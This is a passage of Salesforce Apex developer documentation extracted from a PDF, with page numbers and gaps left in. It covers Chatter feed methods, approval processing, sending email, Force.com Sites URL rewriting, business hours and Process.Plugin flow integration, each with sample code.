All feed types except Filter and Favorites are exposed in the ConnectApi.FeedType enum and passed to one of the
ConnectApi.ChatterFeeds.getFeedElementsFromFeed methods. This example gets the feed elements from the
context users news feed and topics feed:
ConnectApi.FeedElementPage newsFeedElementPage =
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(null,
ConnectApi.FeedType.News, 'me');
ConnectApi.FeedElementPage topicsFeedElementPage =
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(null,
ConnectApi.FeedType.Topics, '0TOD00000000cld');
284
Posts a feed element with plain text from the context user.
postFeedElement(String communityId, ConnectApi.FeedElementInput feedElement,
ConnectApi.BinaryInput feedElementFileUpload)
Posts a feed element from the context user. Use this method to post rich text, including mentions and hashtag topics, and to attach
a file to a feed element. You can also use this method to share a feed element and add a comment.
When you post a feed item, you create a child of a standard or custom object. Specify the parent object in the in the subjectId
parameter or in the subjectId property of the ConnectApi.FeedElementInput object you pass in the feedElement
parameter. The value of the subjectId parameter determines the feeds in which the feed item is displayed. The parent property
in the returned ConnectApi.FeedItem object contains information about the parent object.
Use these methods to complete these tasks:
Post to yourself
This code posts a feed item to the context user. The subjectId specifies me, which is an alias for the context users ID. It could
also specify the context users ID.
ConnectApi.FeedElement feedElement = ConnectApi.ChatterFeeds.postFeedElement(null, 'me',
ConnectApi.FeedElementType.FeedItem, 'Working from home today.');
The parent property of the newly posted feed item contains the ConnectApi.UserSummary of the context user.
Post to another user
This code posts a feed item to a user other than the context user. The subjectId specifies the user ID of the target user.
ConnectApi.FeedElement feedElement = ConnectApi.ChatterFeeds.postFeedElement(null,
'005D00000016Qxp', ConnectApi.FeedElementType.FeedItem, 'Kevin, do you have information
about the new categories?');
The parent property of the newly posted feed item contains the ConnectApi.UserSummary of the target user.
Post to a group
This code posts a feed item with a content attachment to a group. The subjectId specifies the group ID.
ConnectApi.FeedItemInput feedItemInput = new ConnectApi.FeedItemInput();
ConnectApi.ContentAttachmentInput contentAttachmentInput = new
ConnectApi.ContentAttachmentInput();
ConnectApi.MessageBodyInput messageBodyInput = new ConnectApi.MessageBodyInput();
ConnectApi.TextSegmentInput textSegmentInput = new ConnectApi.TextSegmentInput();
contentAttachmentInput.contentDocumentId = '069D00000001pyS';
messageBodyInput.messageSegments = new List<ConnectApi.MessageSegmentInput>();
textSegmentInput.text = 'Would you please review this doc?';
messageBodyInput.messageSegments.add(textSegmentInput);
285
feedItemInput.attachment = contentAttachmentInput;
feedItemInput.body = messageBodyInput;
feedItemInput.feedElementType = ConnectApi.FeedElementType.FeedItem;
// Use a group ID for the subject ID.
feedItemInput.subjectId = '0F9D00000000oOT';
ConnectApi.FeedElement feedElement = ConnectApi.ChatterFeeds.postFeedElement(null,
feedItemInput, null);
The parent property of the newly posted feed item contains the ConnectApi.ChatterGroupSummary of the specified
group.
Post to a record (such as a file or an account)
This code posts a feed item to a record and mentions a group. The subjectId specifies the record ID.
ConnectApi.FeedItemInput feedItemInput = new ConnectApi.FeedItemInput();
ConnectApi.MentionSegmentInput mentionSegmentInput = new ConnectApi.MentionSegmentInput();
ConnectApi.MessageBodyInput messageBodyInput = new ConnectApi.MessageBodyInput();
ConnectApi.TextSegmentInput textSegmentInput = new ConnectApi.TextSegmentInput();
messageBodyInput.messageSegments = new List<ConnectApi.MessageSegmentInput>();
textSegmentInput.text = 'Does anyone know anyone with contacts here?';
messageBodyInput.messageSegments.add(textSegmentInput);
// Mention a group.
mentionSegmentInput.id = '0F9D00000000oOT';
messageBodyInput.messageSegments.add(mentionSegmentInput);
feedItemInput.body = messageBodyInput;
feedItemInput.feedElementType = ConnectApi.FeedElementType.FeedItem;
// Use a record ID for the subject ID.
feedItemInput.subjectId = '001D000000JVwL9';
ConnectApi.FeedElement feedElement = ConnectApi.ChatterFeeds.postFeedElement(null,
feedItemInput, null);
The parent property of the new feed item depends on the record type specified in subjectId. If the record type is File, the
parent is ConnectApi.FileSummary. If the record type is Group, the parent is ConnectApi.ChatterGroupSummary.
If the record type is User, the parent is ConnectApi.UserSummary. For all other record types, as in this example which uses
an Account, the parent is ConnectApi.RecordSummary.
286
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType)
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity
density, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam)
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, Integer recentCommentCount, ConnectApi.FeedDensity
density, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam,
ConnectApi.FeedFilter filter)
Get feed elements from the Bookmarks, Files, Groups, News, People, Record, To, Topics, and UserProfile
feeds
To get the feed elements from these feed types you need to specify a subject ID. If feedType is Record, subjectId can be
any record ID, including a group ID. If feedType is Topics, subjectId must be a topic ID. If feedType is UserProfile,
subjectId can be any user ID. If the feedType is any other value, subjectId must be the ID of the context user or the
alias me..
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId)
287
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount,
ConnectApi.FeedDensity density, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount, Integer
elementsPerBundle, ConnectApi.FeedDensity density, String pageParam, Integer
pageSize, ConnectApi.FeedSortOrder sortParam. Boolean showInternalOnly)
ConnectApi.ChatterFeeds.getFeedElementsFromFeed(String communityId,
ConnectApi.FeedType feedType, String subjectId, Integer recentCommentCount, Integer
elementsPerBundle, ConnectApi.FeedDensity density, String pageParam, Integer
pageSize, ConnectApi.FeedSortOrder sortParam. Boolean showInternalOnly,
ConnectApi.FeedFilter filter)
288
JavaScript Remoting with @RemoteActionserialize Chatter in Apex outputs to JSON as return values and deserialize Chatter
in Apex inputs from JSON as parameters.
Chatter in Apex follows these rules for serialization and deserialization:
Only output objects can be serialized.
Only top-level input objects can be deserialized.
Enum values and exceptions cannot be serialized or deserialized.
289
Wildcards
Important: The composition of a feed may change between releases. Your code should always be prepared to handle instances
of unknown subclasses.
SEE ALSO:
ChatterFeeds Class
ConnectApi.FeedElementCapabilities Class
ConnectApi.MessageSegment Class
ConnectApi.AbstractRecordView Class
Wildcards
Use wildcard characters to match text patterns in Chatter REST API and Chatter in Apex searches.
A common use for wildcards is searching a feed. Pass a search string and wildcards in the q parameter. This example is a Chatter REST
API request:
/chatter/feed-elements?q=chat*
You can specify the following wildcard characters to match text patterns in your search:
Wildcard
Description
Asterisks match zero or more characters at the middle or end (not the beginning) of your search term. For example,
a search for john* finds items that start with john, such as, john, johnson, or johnny. A search for mi* meyers
finds items with mike meyers or michael meyers. If you are searching for a literal asterisk in a word or phrase, then
escape the asterisk (precede it with the \ character).
Question marks match only one character in the middle or end (not the beginning) of your search term. For example,
a search for jo?n finds items with the term john or joan but not jon or johan.
290
291
Test.startTest();
System.assertEquals(2, NewsFeedClass.getNewsFeedCount());
Test.stopTest();
}
}
SEE ALSO:
setTestSearchGroups(String, String, ConnectApi.ChatterGroupPage)
Testing ConnectApi Code
setTestSearchGroups(String, String, Integer, Integer, ConnectApi.ChatterGroupPage)
Testing ConnectApi Code
setTestSearchGroups(String, String, ConnectApi.GroupArchiveStatus, Integer, Integer, ConnectApi.ChatterGroupPage)
Testing ConnectApi Code
post to that group. If the context user is not a member of a private group, the code cant see the feed items for that group and cannot
post to the group.
Asynchronous operations
Some Chatter in Apex operations are asynchronous, that is, they dont occur immediately. For example, if your code adds a feed
item for a user, it is not immediately available in the news feed. Another example: when you add a photo, it is not available immediately.
For testing, this means that if you add a photo, you cant retrieve it immediately.
No XML Support in Apex REST
Apex REST does not support XML serialization and deserialization of Chatter in Apex objects. Apex REST does support JSON serialization
and deserialization of Chatter in Apex objects.
Empty log entries
Information about Chatter in Apex objects doesnt appear in VARIABLE_ASSIGNMENT log events.
No Apex SOAP Web services support
Chatter in Apex objects cannot be used in Apex SOAP Web services indicated with the keyword webservice.
Approval Processing
An approval process is an automated process your organization can use to approve records in Salesforce. An approval process specifies
the steps necessary for a record to be approved and who must approve it at each step. A step can apply to all records included in the
292
process, or just records that meet certain administrator-defined criteria. An approval process also specifies the actions to take when a
record is approved, rejected, recalled, or first submitted for approval.
Apex provides support for creating a programmatic approval process to extend your existing approval processes with the following:
The Apex process classes: Use these to create approval requests, as well as process the results of those requests. For more information,
see the following:
ProcessRequest Class
ProcessResult Class
ProcessSubmitRequest Class
ProcessWorkitemRequest Class
The Approval namespace process method: Use this to submit an approval request, as well as approve or reject existing approval
requests. For more information, see Approval Class.
Note: The process method counts against the DML limits for your organization. See Understanding Execution Governors and
Limits.
For more information on approval processes, see Getting Started with Approval Processes in the Salesforce online help.
IN THIS SECTION:
Apex Approval Processing Example
293
Outbound Email
System.assert(result.isSuccess());
System.assertEquals(
'Pending', result.getInstanceStatus(),
'Instance Status'+result.getInstanceStatus());
// Approve the submitted request
// First, get the ID of the newly created item
List<Id> newWorkItemIds = result.getNewWorkitemIds();
// Instantiate the new ProcessWorkitemRequest object and populate it
Approval.ProcessWorkitemRequest req2 =
new Approval.ProcessWorkitemRequest();
req2.setComments('Approving request.');
req2.setAction('Approve');
req2.setNextApproverIds(new Id[] {UserInfo.getUserId()});
// Use the ID from the newly created item to specify the item to be worked
req2.setWorkitemId(newWorkItemIds.get(0));
// Submit the request for approval
Approval.ProcessResult result2 = Approval.process(req2);
// Verify the results
System.assert(result2.isSuccess(), 'Result Status:'+result2.isSuccess());
System.assertEquals(
'Approved', result2.getInstanceStatus(),
'Instance Status'+result2.getInstanceStatus());
}
}
Outbound Email
You can use Apex to send individual and mass email. The email can include all standard email attributes (such as subject line and blind
carbon copy address), use Salesforce email templates, and be in plain text or HTML format, or those generated by Visualforce.
Note: Visualforce email templates cannot be used for mass email.
You can use Salesforce to track the status of email in HTML format, including the date the email was sent, first opened and last opened,
and the total number of times it was opened. (For more information, see Tracking HTML Email in the Salesforce online help.)
To send individual and mass email with Apex, use the following classes:
SingleEmailMessage
Instantiates an email object used for sending a single email message. The syntax is:
Messaging.SingleEmailMessage mail = new Messaging.SingleEmailMessage();
MassEmailMessage
Instantiates an email object used for sending a mass email message. The syntax is:
Messaging.MassEmailMessage mail = new Messaging.MassEmailMessage();
294
Outbound Email
Messaging
Includes the static sendEmail method, which sends the email objects you instantiate with either the SingleEmailMessage
or MassEmailMessage classes, and returns a SendEmailResult object.
The syntax for sending an email is:
Messaging.sendEmail(new Messaging.Email[] { mail } , opt_allOrNone);
and
Messaging.reserveSingleEmailCapacity(count);
where count indicates the total number of addresses that emails will be sent to.
Note the following:
The email is not sent until the Apex transaction is committed.
The email address of the user calling the sendEmail method is inserted in the From Address field of the email header. All
email that is returned, bounced, or received out-of-office replies goes to the user calling the method.
Maximum of 10 sendEmail methods per transaction. Use the Limits methods to verify the number of sendEmail methods
in a transaction.
Single email messages sent with the sendEmail method count against the sending organization's daily single email limit. When
this limit is reached, calls to the sendEmail method using SingleEmailMessage are rejected, and the user receives a
SINGLE_EMAIL_LIMIT_EXCEEDED error code. However, single emails sent through the application are allowed.
Mass email messages sent with the sendEmail method count against the sending organization's daily mass email limit. When
this limit is reached, calls to the sendEmail method using MassEmailMessage are rejected, and the user receives a
MASS_MAIL_LIMIT_EXCEEDED error code.
Any error returned in the SendEmailResult object indicates that no email was sent.
Messaging.SingleEmailMessage has a method called setOrgWideEmailAddressId. It accepts an object ID to an
OrgWideEmailAddress object. If setOrgWideEmailAddressId is passed a valid ID, the
OrgWideEmailAddress.DisplayName field is used in the email header, instead of the logged-in user's Display Name.
The sending email address in the header is also set to the field defined in OrgWideEmailAddress.Address.
Note: If both OrgWideEmailAddress.DisplayName and setSenderDisplayName are defined, the user receives
a DUPLICATE_SENDER_DISPLAY_NAME error.
For more information, see Organization-Wide Addresses in the Salesforce online help.
295
Inbound Email
Example
// First, reserve email capacity for the current Apex transaction to ensure
// that we won't exceed our daily email limits when sending email after
// the current transaction is committed.
Messaging.reserveSingleEmailCapacity(2);
// Processes and actions involved in the Apex transaction occur next,
// which conclude with sending a single email.
// Now create a new single email message object
// that will send out a single email to the addresses in the To, CC & BCC list.
Messaging.SingleEmailMessage mail = new Messaging.SingleEmailMessage();
// Strings to hold the email addresses to which you are sending the email.
String[] toAddresses = new String[] {'[email protected]'};
String[] ccAddresses = new String[] {'[email protected]'};
// Assign the addresses for the To and CC lists to the mail object.
mail.setToAddresses(toAddresses);
mail.setCcAddresses(ccAddresses);
// Specify the address used when the recipients reply to the email.
mail.setReplyTo('[email protected]');
// Specify the name used as the display name.
mail.setSenderDisplayName('Salesforce Support');
// Specify the subject line for your email address.
mail.setSubject('New Case Created : ' + case.Id);
// Set to True if you want to BCC yourself on the email.
mail.setBccSender(false);
// Optionally append the salesforce.com email signature to the email.
// The email address of the user executing the Apex Code will be used.
mail.setUseSignature(false);
// Specify the text content of the email.
mail.setPlainTextBody('Your Case: ' + case.Id +' has been created.');
mail.setHtmlBody('Your case:<b> ' + case.Id +' </b>has been created.<p>'+
'To view your case <a href=https://na1.salesforce.com/'+case.Id+'>click here.</a>');
// Send the email you have created.
Messaging.sendEmail(new Messaging.SingleEmailMessage[] { mail });
Inbound Email
You can use Apex to receive and process email and attachments. The email is received by the Apex email service, and processed by
Apex classes that utilize the InboundEmail object.
296
Knowledge Management
Note: The Apex email service is only available in Developer, Enterprise, Unlimited, and Performance Edition organizations.
See Apex Email Service.
Knowledge Management
Salesforce Knowledge is a knowledge base where users can easily create and manage content, known as articles, and quickly find and
view the articles they need. Users can write, publish, archive, and manage articles using Apex in addition to the Salesforce user interface.
Use the methods in the KbManagement.PublishingService class to manage the following parts of the lifecycle of an article
and its translations:
Publishing
Updating
Retrieving
Deleting
Submitting for translation
Setting a translation to complete or incomplete status
Archiving
Assigning review tasks for draft articles or translations
Note: Date values are based on GMT.
To use the methods in this class, you must enable Salesforce Knowledge. See Salesforce Knowledge Implementation Guide for more
information on setting up Salesforce Knowledge.
SEE ALSO:
PublishingService Class
297
Actions
To perform DML operations on the SearchPromotionRule sObject, you must enable Salesforce Knowledge.
Actions
Note: In the application, QuickActions are referred to as actions or publisher actions.
The publisher actions feature lets you create actions and add them to the Chatter publisher on the home page, on the Chatter tab, in
Chatter groups, and on record detail pages. In Salesforce1, actions appear in the action bar, its associated action menu, and as list-item
actions.
Create actions let users create records. Theyre different from the Quick Create and Create New features on the Salesforce home page,
because create actions respect validation rules and field requiredness, and you can choose each actions fields.
Custom actions are Visualforce pages or canvas apps with functionality that you define. For example, you can create a custom action
so that users can write comments that are longer than 5,000 characters or create one that integrates a video-conferencing application
so that support agents can communicate visually with customers.
For create, log-a-call, and custom actions, you can create either object-specific actions or global actions. Update actions must be
object-specific.
For more information on actions, see the online help.
SEE ALSO:
QuickAction Class
QuickActionRequest Class
QuickActionResult Class
DescribeQuickActionResult Class
DescribeQuickActionDefaultValue Class
DescribeLayoutSection Class
DescribeLayoutRow Class
DescribeLayoutItem Class
DescribeLayoutComponent Class
DescribeAvailableQuickActionResult Class
Force.com Sites
Force.com Sites lets you build custom pages and Web applications by inheriting Force.com capabilities including analytics, workflow
and approvals, and programmable logic. You can manage your Force.com sites in Apex using the methods of the Site and Cookie
classes.
SEE ALSO:
Site Class
298
With URL rewriting, your users can access blog posts by date and title, say, instead of by record ID. The URL for one of your New Year's
Eve posts might be: http://myblog.force.com/posts/2009/12/31/auld-lang-syne
You can also rewrite URLs for links shown within a site page. If your New Year's Eve post contained a link to your Valentine's Day post,
the link URL might show: http://myblog.force.com/posts/2010/02/14/last-minute-roses
To rewrite URLs for a site, create an Apex class that maps the original URLs to user-friendly URLs, and then add the Apex class to your
site.
To learn about the methods in the Site.UrlRewriter interface, see UrlRewriter.
Consider the following restrictions and recommendations as you create your Apex class:
Class and Methods Must Be Global
The Apex class and methods must all be global.
Class Must Include Both Methods
The Apex class must implement both the mapRequestUrl and generateUrlFor methods. If you don't want to use one
of the methods, simply have it return null.
Rewriting Only Works for Visualforce Site Pages
Incoming URL requests can only be mapped to Visualforce pages associated with your site. You can't map to standard pages, images,
or other entities.
To rewrite URLs for links on your site's pages, use the !URLFOR function with the $Page merge variable. For example, the
following links to a Visualforce page named myPage:
<apex:outputLink value="{!URLFOR($Page.myPage)}"></apex:outputLink>
Note: Visualforce <apex:form> elements with forceSSL=true aren't affected by the urlRewriter.
See the Functions appendix of the Visualforce Developer's Guide.
299
Encoded URLs
The URLs you get from using the Site.urlRewriter interface are encoded. If you need to access the unencoded values of
your URL, use the urlDecode method of the EncodingUtil Class.
Restricted Characters
User-friendly URLs must be distinct from Salesforce URLs. URLs with a three-character entity prefix or a 15- or 18-character ID are
not rewritten.
You can't use periods in your rewritten URLs.
Restricted Strings
You can't use the following reserved strings as part of a rewritten URL path:
apexcomponent
apexpages
ex
faces
flash
flex
google
home
ideas
images
img
javascript
js
lumen
m
resource
search
secur
services
servlet
setup
sfc
sfdc_ns
site
style
vote
widg
Relative Paths Only
The PageReference.getUrl() method only returns the part of the URL immediately following the host name or site prefix (if any). For
example, if your URL is http://mycompany.force.com/sales/MyPage?id=12345, where sales is the site prefix,
only /MyPage?id=12345 is returned.
300
Code Example
In this example, we have a simple site consisting of two Visualforce pages: mycontact and myaccount. Be sure you have Read permission
enabled for both before trying the sample. Each page uses the standard controller for its object type. The contact page includes a link
to the parent account, plus contact details.
Before implementing rewriting, the address bar and link URLs showed the record ID (a random 15-digit string), illustrated in the before
figure. Once rewriting was enabled, the address bar and links show more user-friendly rewritten URLs, illustrated in the after figure.
The Apex class used to rewrite the URLs for these pages is shown in Example URL Rewriting Apex Class, with detailed comments.
301
The account page uses the standard controller for accounts and is nothing more than a standard detail page. This page should be named
myaccount.
<apex:page standardController="Account">
<apex:detail relatedList="false"/>
</apex:page>
The contact page uses the standard controller for contacts and consists of two parts. The first part links to the parent account using the
URLFOR function and the $Page merge variable; the second simply provides the contact details. Notice that the Visualforce page
doesn't contain any rewriting logic except URLFOR. This page should be named mycontact.
<apex:page standardController="contact">
<apex:pageBlock title="Parent Account">
<apex:outputLink value="{!URLFOR($Page.mycontact,null,
[id=contact.account.id])}">{!contact.account.name}
</apex:outputLink>
</apex:pageBlock>
<apex:detail relatedList="false"/>
</apex:page>
302
303
if(url.startsWith(ACCOUNT_VISUALFORCE_PAGE)){
myFriendlyUrls.add(new PageReference(ACCOUNT_PAGE + accounts.get(counter).name));
counter++;
} else {
//If this doesn't start like an account page,
//don't do any transformations
myFriendlyUrls.add(mySalesforceUrl);
}
}
//Return the full list of pages
return myFriendlyUrls;
}
}
304
Support Classes
Support Classes
Support classes allow you to interact with records commonly used by support centers, such as business hours and cases.
This example finds the time one business hour from startTime, returning the Datetime in GMT:
// Get the default business hours
BusinessHours bh = [SELECT Id FROM BusinessHours WHERE IsDefault=true];
305
Visual Workflow
The next example finds the difference between startTime and nextTime:
// Get the default business hours
BusinessHours bh = [select id from businesshours where IsDefault=true];
// Create Datetime on May 28, 2008 at 1:06:08 AM in local timezone.
Datetime startTime = Datetime.newInstance(2008, 5, 28, 1, 6, 8);
// Create Datetime on May 28, 2008 at 4:06:08 PM in local timezone.
Datetime endTime = Datetime.newInstance(2008, 5, 28, 16, 6, 8);
// Find the number of business hours milliseconds between startTime and endTime as
// defined by the default business hours. Will return a negative value if endTime is
// before startTime, 0 if equal, positive value otherwise.
Long diff = BusinessHours.diff(bh.id, startTime, endTime);
SEE ALSO:
BusinessHours Class
Cases Class
Visual Workflow
Visual Workflow allows administrators to build applications, known as flows, that guide users through screens for collecting and updating
data.
306
For example, you can use Visual Workflow to script calls for a customer support center or to generate real-time quotes for a sales
organization. You can embed a flow in a Visualforce page and access it in a Visualforce controller using Apex.
You can retrieve flow variables for a specific flow in Apex. The Flow.Interview Apex class provides the getVariableValue
method for retrieving a flow variable, which can be in the flow embedded in the Visualforce page, or in a separate flow that is called by
a subflow element. This example shows how to use this method to obtain breadcrumb (navigation) information from the flow embedded
in the Visualforce page. If that flow contains subflow elements, and each of the referenced flows also contains a vaBreadCrumb
variable, the Visualforce page can provide users with breadcrumbs regardless of which flow the interview is running.
public class SampleContoller {
// Instance of the flow
public Flow.Interview.Flow_Template_Gallery myFlow {get; set;}
public String getBreadCrumb() {
String aBreadCrumb;
if (myFlow==null) { return 'Home';}
else aBreadCrumb = (String) myFlow.getVariableValue('vaBreadCrumb');
return(aBreadCrumb==null ? 'Home': aBreadCrumb);
}
}
SEE ALSO:
Interview Class
interface exposes Apex as a service, which accepts input values and returns output back to the flow.
When you define an Apex class that implements the Process.Plugin interface in your organization, the Cloud Flow Designer
displays the Apex class in the Palette.
Process.Plugin has the following top level classes:
Process.PluginRequest
Process.PluginResult
Process.PluginDescribeResult
The Process.PluginRequest class passes input parameters from the class that implements the interface to the flow.
The Process.PluginResult class returns output parameters from the class that implements the interface to the flow.
The Process.PluginRequest class passes input parameters from a flow to the class that implements the interface.
When youre writing Apex unit tests, you must instantiate a class and pass it in the interface invoke method. You must also create a
map and use it in the constructor to pass in the parameters needed by the system.
For more information, see Using the Process.PluginRequest Class on page 309.
The Process.PluginDescribeResult class is used to determine the input parameters and output parameters needed by
the Process.PluginResult plug-in.
307
IN THIS SECTION:
Implementing the Process.Plugin Interface
Using the Process.PluginRequest Class
Using the Process.PluginResult Class
Using the Process.PluginDescribeResult Class
Process.Plugin Data Type Conversions
Sample Process.Plugin Implementation for Lead Conversion
The following are the methods that must be called by the class that implements the Process.Plugin interface:
Name
Arguments
Return Type
Description
Process.PluginDescribeResult Returns a
Process.PluginDescribeResult
describe
Process.PluginRequest Process.PluginResult
Example Implementation
global class flowChat implements Process.Plugin {
// The main method to be implemented. The Flow calls this at runtime.
global Process.PluginResult invoke(Process.PluginRequest request) {
// Get the subject of the Chatter post from the flow
String subject = (String) request.inputParameters.get('subject');
// Use the Chatter APIs to post it to the current user's feed
FeedItem fItem = new FeedItem();
fItem.ParentId = UserInfo.getUserId();
fItem.Body = 'Force.com flow Update: ' + subject;
insert fItem;
// return to Flow
Map<String,Object> result = new Map<String,Object>();
return new Process.PluginResult(result);
}
// Returns the describe information for the interface
global Process.PluginDescribeResult describe() {
Process.PluginDescribeResult result = new Process.PluginDescribeResult();
result.Name = "flowchatplugin";
result.Tag = "chat";
308
result.inputParameters = new
List<Process.PluginDescribeResult.InputParameter>{
new Process.PluginDescribeResult.InputParameter('subject',
Process.PluginDescribeResult.ParameterType.STRING, true)
};
result.outputParameters = new
List<Process.PluginDescribeResult.OutputParameter>{ };
return result;
}
}
Test Class
The following is a test class for the above class.
@isTest
private class flowChatTest {
static testmethod void flowChatTests() {
flowChat plugin = new flowChat();
Map<String,Object> inputParams = new Map<String,Object>();
string feedSubject = 'Flow is alive';
InputParams.put('subject', feedSubject);
Process.PluginRequest request = new Process.PluginRequest(inputParams);
plugin.invoke(request);
}
}
The following is an example of instantiating the Process.PluginRequest class with one input parameter:
Map<String,Object> inputParams = new Map<String,Object>();
string feedSubject = 'Flow is alive';
InputParams.put('subject', feedSubject);
Process.PluginRequest request = new Process.PluginRequest(inputParams);
309
Code Example
In this example, the code returns the subject of a Chatter post from a flow and posts it to the current user's feed.
global Process.PluginResult invoke(Process.PluginRequest request) {
// Get the subject of the Chatter post from the flow
String subject = (String) request.inputParameters.get('subject');
// Use the Chatter APIs to post it to the current user's feed
FeedPost fpost = new FeedPost();
fpost.ParentId = UserInfo.getUserId();
fpost.Body = 'Force.com flow Update: ' + subject;
insert fpost;
// return to Flow
Map<String,Object> result = new Map<String,Object>();
return new Process.PluginResult(result);
}
// describes the interface
global Process.PluginDescribeResult describe() {
Process.PluginDescribeResult result = new Process.PluginDescribeResult();
result.inputParameters = new List<Process.PluginDescribeResult.InputParameter>{
new Process.PluginDescribeResult.InputParameter('subject',
Process.PluginDescribeResult.ParameterType.STRING, true)
};
result.outputParameters = new List<Process.PluginDescribeResult.OutputParameter>{
};
return result;
}
}
310
The following describe the properties of Process.PluginDescribeResult and its input and output parameter subclasses:
PluginDescribeResult Class Properties
PluginDescribeResult.InputParameter Class Properties
PluginDescribeResult.OutputParameter Class Properties
The following is the constructor of the Process.PluginDescribeResult.InputParameter class:
Process.PluginDescribeResult.InputParameter ip = new
Process.PluginDescribeResult.InputParameter(Name,Optional_description_string,
Process.PluginDescribeResult.ParameterType.Enum, Boolean_required);
To use the Process.PluginDescribeResult class, create instances of the following additional subclasses:
Process.PluginDescribeResult.InputParameter
Process.PluginDescribeResult.OutputParameter
Process.PluginDescribeResult.InputParameter is a list of input parameters and has the following format:
Process.PluginDescribeResult.inputParameters =
new List<Process.PluginDescribeResult.InputParameter>{
new Process.PluginDescribeResult.InputParameter(Name,Optional_description_string,
Process.PluginDescribeResult.ParameterType.Enum, Boolean_required)
For example:
Process.PluginDescribeResult result = new Process.PluginDescribeResult();
result.setDescription('this plugin gets the name of a user');
311
result.setTag ('userinfo');
result.inputParameters = new List<Process.PluginDescribeResult.InputParameter>{
new Process.PluginDescribeResult.InputParameter('FullName',
Process.PluginDescribeResult.ParameterType.STRING, true),
new Process.PluginDescribeResult.InputParameter('DOB',
Process.PluginDescribeResult.ParameterType.DATE, true),
};
For example:
Process.PluginDescribeResult result = new Process.PluginDescribeResult();
result.setDescription('this plugin gets the name of a user');
result.setTag ('userinfo');
result.outputParameters = new List<Process.PluginDescribeResult.OutputParameter>{
new Process.PluginDescribeResult.OutputParameter('URL',
Process.PluginDescribeResult.ParameterType.STRING),
Both classes take the Process.PluginDescribeResult.ParameterType Enum, which has the following values:
BOOLEAN
DATE
DATETIME
DECIMAL
DOUBLE
FLOAT
ID
INTEGER
LONG
STRING
For example:
Process.PluginDescribeResult result = new Process.PluginDescribeResult();
result.outputParameters = new List<Process.PluginDescribeResult.OutputParameter>{
new Process.PluginDescribeResult.OutputParameter('URL',
Process.PluginDescribeResult.ParameterType.STRING, true),
new Process.PluginDescribeResult.OutputParameter('STATUS',
Process.PluginDescribeResult.ParameterType.STRING),
};
312
Data Type
Number
Decimal
Date
Datetime/Date
DateTime
Datetime/Date
Boolean
Text
String
313
createOpportunity, opportunityName,
sendEmailToOwner);
return new Process.PluginResult(result);
}
// This method describes the plug-in and its inputs from
// and outputs to the flow.
// Implementing this method adds the class to the
// Cloud Flow Designer palette.
global Process.PluginDescribeResult describe() {
// Set up plugin metadata
Process.PluginDescribeResult result = new
Process.PluginDescribeResult();
result.description =
'The LeadConvert Flow Plug-in converts a lead into ' +
'an account, a contact, and ' +
'(optionally)an opportunity.';
result.tag = 'Lead Management';
// Create a list that stores both mandatory and optional
// input parameters from the flow.
// NOTE: Only primitive types (STRING, NUMBER, etc.) are
// supported at this time.
// Collections are currently not supported.
result.inputParameters = new
List<Process.PluginDescribeResult.InputParameter>{
// Lead ID (mandatory)
new Process.PluginDescribeResult.InputParameter(
'LeadID',
Process.PluginDescribeResult.ParameterType.STRING,
true),
// Account Id (optional)
new Process.PluginDescribeResult.InputParameter(
'AccountID',
Process.PluginDescribeResult.ParameterType.STRING,
false),
// Contact ID (optional)
new Process.PluginDescribeResult.InputParameter(
'ContactID',
Process.PluginDescribeResult.ParameterType.STRING,
false),
// Status to use once converted
new Process.PluginDescribeResult.InputParameter(
'ConvertedStatus',
Process.PluginDescribeResult.ParameterType.STRING,
true),
new Process.PluginDescribeResult.InputParameter(
'OpportunityName',
Process.PluginDescribeResult.ParameterType.STRING,
false),
new Process.PluginDescribeResult.InputParameter(
'OverwriteLeadSource',
Process.PluginDescribeResult.ParameterType.BOOLEAN,
314
false),
new Process.PluginDescribeResult.InputParameter(
'CreateOpportunity',
Process.PluginDescribeResult.ParameterType.BOOLEAN,
false),
new Process.PluginDescribeResult.InputParameter(
'SendEmailToOwner',
Process.PluginDescribeResult.ParameterType.BOOLEAN,
false)
};
// Create a list that stores output parameters sent
// to the flow.
result.outputParameters = new List<
Process.PluginDescribeResult.OutputParameter>{
// Account ID of the converted lead
new Process.PluginDescribeResult.OutputParameter(
'AccountID',
Process.PluginDescribeResult.ParameterType.STRING),
// Contact ID of the converted lead
new Process.PluginDescribeResult.OutputParameter(
'ContactID',
Process.PluginDescribeResult.ParameterType.STRING),
// Opportunity ID of the converted lead
new Process.PluginDescribeResult.OutputParameter(
'OpportunityID',
Process.PluginDescribeResult.ParameterType.STRING)
};
return result;
}
/**
* Implementation of the LeadConvert plug-in.
* Converts a given lead with several options:
* leadID - ID of the lead to convert
* contactID * accountID - ID of the Account to attach the converted
* Lead/Contact/Opportunity to.
* convertedStatus * overWriteLeadSource * createOpportunity - true if you want to create a new
* Opportunity upon conversion
* opportunityName - Name of the new Opportunity.
* sendEmailtoOwner - true if you are changing owners upon
* conversion and want to notify the new Opportunity owner.
*
* returns: a Map with the following output:
* AccountID - ID of the Account created or attached
* to upon conversion.
* ContactID - ID of the Contact created or attached
* to upon conversion.
* OpportunityID - ID of the Opportunity created
* upon conversion.
315
*/
public Map<String,String> convertLead (
String leadID,
String contactID,
String accountID,
String convertedStatus,
Boolean overWriteLeadSource,
Boolean createOpportunity,
String opportunityName,
